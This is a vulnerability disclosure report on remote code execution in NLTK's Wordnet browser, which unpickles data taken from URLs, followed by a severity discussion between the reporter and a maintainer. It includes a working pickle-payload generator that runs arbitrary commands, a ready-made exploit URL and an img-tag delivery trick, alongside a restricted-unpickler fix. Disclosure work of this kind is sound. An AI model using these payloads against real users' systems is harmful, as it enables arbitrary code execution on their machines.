RCE in Wordnet Browser in nltk/nltk
Reported on
Dec 29th 2022
Description
A user who visits a malicious link while the Wordnet browser is running will execute attacker-controlled code on their system.
Proof of Concept
Visit
http://localhost:8000/lookup_gASVKwAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjBB0b3VjaCAvdG1wL1BXTkVElIWUUpQu
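The base64 payload is generated by the following script:
import pickle
import sys
import base64

DEFAULT_COMMAND = "touch /tmp/PWNED"
# Command to run on the victim's machine; overridable from the command line.
COMMAND = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_COMMAND

class PickleRce(object):
    # __reduce__ tells pickle to call os.system(COMMAND) when the data is loaded.
    def __reduce__(self):
        import os
        return (os.system, (COMMAND,))

# Decode to str so the output can be pasted straight into the URL.
print(base64.b64encode(pickle.dumps(PickleRce())).decode())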
After visiting the link, /tmp/PWNED is created on the system:
ls /tmp
PWNED
This happens because nltk calls pickle.loads on untrusted input taken from the URL.
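To see what the link carries without running it, the payload can be disassembled instead of loaded. The sketch below is illustrative only: it uses the standard-library pickletools.genops, which walks the opcodes without executing them, and the helper name describe_pickle is made up for this example.

```python
import base64
import pickletools

# Payload copied from the proof-of-concept URL (the part after "lookup_").
PAYLOAD_B64 = (
    "gASVKwAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjBB0b3VjaCAvdG1wL1BXTkVElIWUUpQu"
)


def describe_pickle(data):
    """Return (opcode name, argument) pairs without executing the pickle.

    Hypothetical helper for this example; genops only parses the byte stream.
    """
    return [(op.name, arg) for op, arg, _pos in pickletools.genops(data)]


raw = base64.b64decode(PAYLOAD_B64)
ops = describe_pickle(raw)

for name, arg in ops:
    print(name, arg)
```

The listing contains the strings posix and system, a STACK_GLOBAL opcode that resolves them to a callable, and a REDUCE opcode that calls it with the command string. pickle.loads would perform that call.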
Impact
RCE by inducing a user to visit a link.
Occurrences
wordnet_app.py L697
nltk is unsafely using pickle.loads here
Wordnet browser can be started by:
nltk.app.wordnet_app.app()
This vulnerability is concerning because a victim only needs to load a malicious img tag on their computer while their Wordnet browser is open for malicious code to execute.
In the previous report, the maintainer mentioned never having heard of anyone using it, but the GitHub issue thread https://github.com/nltk/nltk/issues/3002 shows otherwise: people are still using the Wordnet browser, and they are vulnerable to RCE.
Some guidance on how to fix this: https://docs.python.org/3.7/library/pickle.html#pickle.Unpickler.find_class
And https://docs.python.org/3.7/library/pickle.html#pickle-restrict
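As a rough illustration of what those two links describe, here is a minimal sketch of a restricted unpickler. It is not the NLTK fix: the allow-list SAFE_BUILTINS and the helper restricted_loads are assumptions made for this example, and the report does not show what data the browser actually stores in its URLs.

```python
import base64
import builtins
import io
import pickle

# Hypothetical allow-list: only these builtins may be resolved while unpickling.
SAFE_BUILTINS = {"dict", "list", "set", "frozenset", "tuple", "str", "int"}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses every global outside the allow-list."""

    def find_class(self, module, name):
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        # Everything else (os.system, posix.system, ...) is rejected
        # before it can be imported or called.
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data):
    """Drop-in analogue of pickle.loads() using the restricted unpickler."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


# Plain data still round-trips.
state = ("dog", {"hypernym", "hyponym"})
restored = restricted_loads(pickle.dumps(state))

# The proof-of-concept payload is rejected instead of executed.
poc = base64.b64decode(
    "gASVKwAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjBB0b3VjaCAvdG1wL1BXTkVElIWUUpQu"
)
try:
    restricted_loads(poc)
    blocked = False
except pickle.UnpicklingError:
    blocked = True
```

If the data in the URL is only strings and simple containers, avoiding pickle altogether (for example, by using JSON) may be simpler than maintaining an allow-list.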
Just my 2 cents, I don't think that this should be low. I agree that the severity for the previous report https://huntr.dev/bounties/861a8d11-0fe9-4c2f-9112-af3a9559fa87/ should be set to low, as the XSS is not really useful for an attacker (there are no cookies for the application). But this one involves an RCE which can be triggered by just visiting any page online with a malicious <img> tag.
I think https://github.com/nltk/nltk/issues/3002 is evidence enough that people are indeed still using the Wordnet browser today. And, these people who are still using the wordnet browser should be concerned about this issue and upgrade their browser to prevent other people from executing malicious code on their systems. That this critical error remained undetected for 13 years is not a good justification as users of the browser are not typically security researchers. I would lean towards this being High due to the possible RCE impact (at minimum) with a big disclaimer that this only affects users of the wordnet browser.
But again, just my 2 cents.
^ Correction: I would lean towards this being High (at minimum) due to the possible RCE impact
"That this critical error remained undetected for 13 years is not a good justification as users of the browser are not typically security researchers."
The critical error that I was referring to was the lack of parentheses in the line shown in https://github.com/nltk/nltk/issues/3002. This critical error would prevent the wordnet browser from working in normal circumstances, and would be detected by any user, not just concerned researchers like yourself. I stand by my belief that the wordnet browser is rarely used.
However, I'm not unreasonable. I am open to a discussion on what the severity of this report ought to be, and I recognize that there are differences between this report and the former. In particular:
- This vulnerability is much more severe.
- This report has the benefit of a compound effect: I'm more inclined to notify users now that there have been two vulnerabilities in the wordnet browser.
I'm not very well aware of the img tag attack, could you elaborate on that?
I wasn't aware that https://github.com/nltk/nltk/issues/3002 fixed quite a major bug. Apologies for that. In that case, I'd agree with you that the app is rarely used.
"I'm not very well aware of the img tag attack, could you elaborate on that?"
What I meant is that someone would only need to come across this HTML (in another tab, of course) while the Wordnet browser is open for RCE to occur:
<img src="http://localhost:8000/lookup_gASVKwAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjBB0b3VjaCAvdG1wL1BXTkVElIWUUpQu">
In normal circumstances, I would consider that a critical/high vulnerability, given that huntr's scope covers the entire repository and this is a documented API (just not a widely used one). But as you've mentioned, this module may be rarely used.
I do think there is a possibility of future impact, where users might stumble upon wordnet_app and start to use it, as mentioned in the Github issue. Taking this into account, I think medium would be fine for this vulnerability. Do you agree?
Alternatively, we can also go with High and point out that only the rarely used wordnet app is affected as @psmoros pointed out in the other thread.
@psmoros it may be better to provide maintainers with the ability to set an "environment" score which reflects how many users would be affected by usage of an API and adjust the score based on that -- sort of like what HackerOne does
I've discussed it with the team, and we have decided to remove the Wordnet Browser from NLTK (and move it to https://github.com/nltk/nltk_contrib/). As a result, I don't deem it necessary to push out a CVE notifying users to update to a new version, as there will only be one version with the fixes (3.8.1) before we remove the functionality altogether. After some consideration I've decided to leave the severity at the level that you suggested, and I'll leave the final judgement for the CVE to Huntr.
I apologize for the consequences for your credibility and disclosure bounty from the reduction in severity. I appreciate the time and effort that you put into this report.
cc: @admin